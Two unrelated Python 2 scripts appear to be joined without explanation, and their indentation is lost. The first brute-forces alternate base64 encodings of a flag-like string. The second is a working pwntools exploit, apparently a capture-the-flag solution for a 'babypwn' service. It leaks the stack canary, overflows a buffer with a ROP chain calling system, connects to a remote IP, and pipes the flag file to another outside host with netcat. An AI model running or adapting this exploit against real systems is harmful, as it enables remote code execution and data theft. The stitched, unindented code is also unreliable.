from string import ascii_letters
from base64 import *
target = ['T', 'j', 'B', 'f', 'b', 'T', 'R', 'u', 'X', '2', 'M', '0', 'b', 'D', 'F', 'f', 'Y', 'W', 'c', '0', 'a', 'W', '5', 'f', 'W', 'T', 'N', 'z', 'd', 'D', 'N', 'y', 'Z', 'D', 'R', '5', 'O', 'i', 'g', '=']
ts = "TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5Oig="
for i in range(len(target)):
tmp = []
for k in range(len(ts)):
tmp.append(ts[k])
for j in range(len(ascii_letters)):
tmp[i] = ascii_letters[j]
if b64decode(''.join(tmp)) == b64decode(ts):
print ''.join(tmp)
#!/usr/bin/python
from pwn import *
from struct import *
from time import *
up = lambda x : unpack("<L",x)[0]
e = ELF("./babypwn")
bss = 0x0804b1b4
recv_plt = 0x080486e0
system_plt = 0x08048620
ppppr = 0x08048eec
payload = ''
payload += p32(recv_plt)
payload += p32(ppppr)
payload += p32(4)
payload += p32(bss)
payload += p32(100)
payload += p32(0)
payload += p32(system_plt)
payload += "DUMM"
payload += p32(bss)
#p = remote('localhost',20001)
p = remote("110.10.212.130",8888)
p.recvuntil("Select menu > ")
p.sendline("1")
p.recvuntil("Input Your Message : ")
p.sendline("A"*40)
p.recvuntil("A"*40)
leak = p.recv(4)
print "[*] Leaked : " + hex(up(leak))
canary = "\x00"+leak[1:]
print "[*] Canary : " + hex(up(canary))
p.recvuntil("Select menu > ")
p.sendline("1")
p.recvuntil("Input Your Message : ")
p.sendline("A"*40+canary+"A"*12+payload)
p.recvuntil("Select menu > ")
p.sendline("3")
sleep(0.5)
p.sendline("cat flag | nc 52.199.49.117 44444")
p.close()